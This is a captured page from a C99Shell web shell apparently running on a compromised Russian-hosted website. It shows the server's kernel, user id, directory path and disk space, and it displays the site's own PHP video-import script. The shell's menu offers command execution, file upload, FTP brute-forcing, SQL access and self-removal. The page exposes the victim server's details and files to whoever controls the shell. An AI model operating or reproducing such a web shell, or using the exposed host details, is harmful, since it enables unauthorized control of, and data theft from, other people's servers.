!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.68 (Linux) PHP/7.4.33. PHP/7.4.33 

uname -a: Linux bjb2293782.nichost.ru 6.6.151-1.el8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Aug 10
11:16:02 MSK 2026 x86_64
 

uid=12584(bjb2293782) gid=12584(bjb2293782) groups=12584(bjb2293782)  

Safe-mode: OFF (not secure)

/home/bjb2293782/xn--80abaeoqbbrbgf8aea5a2a2z.xn--p1ai/docs/   drwxr-x---
Free 2664.76 GB of 4607.12 GB (57.84%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     import.php (1.19 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

die("ERROR: Do not run this script!\n");

require(
"import/lvVideos.php");

require(
"std2.php");


$mysql mysqlopen();

mysqli_query($mysql"DELETE FROM libVideos WHERE `date`>='2022-01-01'");
if (
mysqli_errno($mysql)) die("ERROR: ".mysqli_error($mysql)." at line ".__LINE__." of file ".__FILE__."\n");


$filialTable=array(
-
1=>-1,
1=>'11',
2=>'1',
3=>'2',
4=>'4',
5=>'5',
6=>'6',
7=>'7',
8=>'8',
9=>'12',
10=>'13',
11=>'14');


$sql "INSERT INTO `libVideos` (`filial`, `name`, `desc`, `video`, `date`, `duration`, `visits`) VALUES \n";
$first true;

foreach(
$lvVideos as &$lv)
{
    if (
$first$first false; else $sql.=",\n";


    
$filial $filialTable[$lv['filial']];
    
$name mysqli_escape_string($mysql$lv['name']);
    
$desc mysqli_escape_string($mysql$lv['desc']);
    
$video mysqli_escape_string($mysql$lv['video']);
    
$date $lv['date'];
    
$duration intval($lv['duration']);
    
$visits intval($lv['visits']);


    
$sql.="($filial,'$name','$desc','$video','$date',$duration,$visits)";
}

mysqli_query($mysql$sql);

if (
mysqli_errno($mysql)) die("ERROR: ".mysqli_error($mysql)." at line ".__LINE__." of file ".__FILE__."\n");


die(
"OK");

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0048 ]--